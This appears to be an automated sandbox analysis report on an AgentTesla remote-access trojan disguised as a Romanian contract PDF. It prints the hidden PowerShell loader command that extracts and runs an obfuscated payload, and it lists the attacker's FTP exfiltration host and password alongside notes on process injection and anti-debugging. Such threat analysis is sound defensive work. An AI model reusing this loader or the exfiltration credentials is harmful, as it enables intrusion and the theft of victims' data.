Analysis
-
max time kernel
148s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 18:04
Static task
static1
Behavioral task
behavioral1
Sample
CONTRACTUL MODIFICAT-pdf.bat.exe
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
CONTRACTUL MODIFICAT-pdf.bat.exe
Resource
win10v2004-20240508-en
General
-
Target
CONTRACTUL MODIFICAT-pdf.bat.exe
-
Size
857KB
-
MD5
6606904cf124e2e43df5401efe1aa7f5
-
SHA1
0700d6cb81beb6a3bb4ff4e941f4e260d7d6795f
-
SHA256
47c8f1af1f9f8e3a0ad8f359cb14ea08b3261efde59260d8ec5b92d4dfd90587
-
SHA512
abc409300b90e0db70a91ea64d8aa14458fdc153be7b228e586deaa3fbef68fb3e42d2a882d1aeaa3f25f325553affb204fed42e056f2b2ff7476050e32e2c13
-
SSDEEP
12288:2TdHutP4ws2ERwovFRG4zNdE1SqYfsyN1fR8MbbAi77tkmY+V5Ekikwh+:2Ti4L2uwovjGiYFqsS1xbHnY+V5Okx
Malware Config
Extracted
agenttesla
Protocol: ftp- Host:
ftp://ftp.piny.ro - Port:
21 - Username:
[email protected] - Password:
playingboyz231
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2808 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2188 powershell.exe 2808 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2188 set thread context of 2808 2188 powershell.exe wab.exe -
Drops file in Windows directory 1 IoCs
Processes:
CONTRACTUL MODIFICAT-pdf.bat.exedescription ioc process File opened for modification C:\Windows\Brugerkataloget.jag CONTRACTUL MODIFICAT-pdf.bat.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
Processes:
powershell.exewab.exepid process 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 2188 powershell.exe 2808 wab.exe 2808 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2188 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exewab.exedescription pid process Token: SeDebugPrivilege 2188 powershell.exe Token: SeDebugPrivilege 2808 wab.exe -
Suspicious use of WriteProcessMemory 14 IoCs
Processes:
CONTRACTUL MODIFICAT-pdf.bat.exepowershell.exedescription pid process target process PID 3056 wrote to memory of 2188 3056 CONTRACTUL MODIFICAT-pdf.bat.exe powershell.exe PID 3056 wrote to memory of 2188 3056 CONTRACTUL MODIFICAT-pdf.bat.exe powershell.exe PID 3056 wrote to memory of 2188 3056 CONTRACTUL MODIFICAT-pdf.bat.exe powershell.exe PID 3056 wrote to memory of 2188 3056 CONTRACTUL MODIFICAT-pdf.bat.exe powershell.exe PID 2188 wrote to memory of 2672 2188 powershell.exe cmd.exe PID 2188 wrote to memory of 2672 2188 powershell.exe cmd.exe PID 2188 wrote to memory of 2672 2188 powershell.exe cmd.exe PID 2188 wrote to memory of 2672 2188 powershell.exe cmd.exe PID 2188 wrote to memory of 2808 2188 powershell.exe wab.exe PID 2188 wrote to memory of 2808 2188 powershell.exe wab.exe PID 2188 wrote to memory of 2808 2188 powershell.exe wab.exe PID 2188 wrote to memory of 2808 2188 powershell.exe wab.exe PID 2188 wrote to memory of 2808 2188 powershell.exe wab.exe PID 2188 wrote to memory of 2808 2188 powershell.exe wab.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\CONTRACTUL MODIFICAT-pdf.bat.exe"C:\Users\Admin\AppData\Local\Temp\CONTRACTUL MODIFICAT-pdf.bat.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3056 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Licks=cat 'C:\Users\Admin\AppData\Roaming\sidonian\Bespyttedes.Civ';$Antihumanist=$Licks.substring(41927,3);.$Antihumanist($Licks)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2188 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵PID:2672
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"3⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
78KB
MD51ef4bed7239f000331bdf0a88602f2a1
SHA1e9330cb97761334bc1e3dfeb2594196458547a09
SHA256b2f0b93f0795e5d02cef80a1a8ffb55470b3d903a08781090c2cef80ba12c2fe
SHA5123a5073bff3b3d4b6fcd52abedeabc6797a2682d5a676a77c1198da3d26cabd52f82b59ec5d054f0c68aeaa330f33ea70c1746da7e138aa6516bd13163919175a
-
Filesize
300KB
MD54941d3dc5698b0ed0e3007a9299e8a91
SHA1dd0a948f26ddc1c320eadd4878e14b38c8ca17e0
SHA2566b3e288faec3c663717827c60d1ff261b7e28a4647a9ce1559518544c068d9a6
SHA512eb0d9cd5de104a4cc5a19cf33b9fbf279a28c19e04afc120b4ca75abf68c03ea47b92ad58a260306d3ec45516c95566185ba510d80aef0ae9af9202676970038